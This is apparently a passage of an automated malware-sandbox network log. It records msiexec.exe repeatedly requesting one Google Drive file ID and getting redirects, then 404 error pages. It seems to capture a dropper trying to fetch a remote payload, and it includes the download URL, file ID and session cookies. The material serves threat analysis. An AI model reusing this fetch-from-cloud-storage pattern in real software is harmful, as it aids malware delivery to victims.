                                                                2025-01-11 03:27:29 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 2d 57 57 70 6c 41 6e 46 54 57 76 4c 39 47 31 79 4d 30 64 37 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="T-WWplAnFTWvL9G1yM0d7A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                26192.168.2.1150007142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:30 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:30 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:30 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-XsWOxnN8iUR00aENFATMJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                27192.168.2.1150008142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:31 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:31 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgTAAc0OKIIuUvGcNeUOOXq_H5G-nN3--xhr9X5jciEjk73LrWR1tkjaSQT84uUjeS6JGWTFrzY
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:31 GMT
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-OVH4PVNzRNZK_kIP8Of2Ow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:27:31 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 79 74 4f 4a 48 55 6d 59 47 44 45 39 5a 4e 42 65 63 43 6c 62 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0ytOJHUmYGDE9ZNBecClbQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                28192.168.2.1150009142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:32 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:33 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:33 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-UOOhRR-wLgOFz-BNnaEP1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                29192.168.2.1150010142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:33 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:34 UTC1844INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgQ4J6luVjsf5UzUvt8nNSgTiGcsZEJgh9QrG8nL_8qY6sf4c6TDd8505iH1izWjYZaP
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:34 GMT
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-_5SKqCsWboxf1JsByqZpWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:27:34 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 30 38 39 30 34 75 5a 52 4c 4c 58 42 6d 58 37 7a 38 47 30 43 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="p08904uZRLLXBmX7z8G0CQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                30192.168.2.1150011142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:35 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:35 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:35 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-BKRA830OWcsn1sl_HFI3Qg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                31192.168.2.1150012142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:36 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:36 UTC1844INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgTI9oAh2-K8x_9ZFSSjwelb9vLB_aBikr6pTfHlaYLl5Wk8nxOJYzyj3e9oBxFYvyZt
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:36 GMT
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: script-src 'nonce-VTYqubCigAwQRc3YhHj23A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:27:36 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 76 4b 72 69 30 6e 34 6c 64 65 57 62 39 31 49 43 4a 38 38 70 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nvKri0n4ldeWb91ICJ88pQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                32192.168.2.1150013142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:37 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:37 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:37 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-Z5SsEP_lTV1TMuepER0NOg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                33192.168.2.1150014142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:38 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:39 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgRTuIO6slElX1NK4eSrKYJwXkc217yz3tKuRL6iy8cBHIgVI1i3MqXRv16MRbcbzvtTTybNcn4
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:38 GMT
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
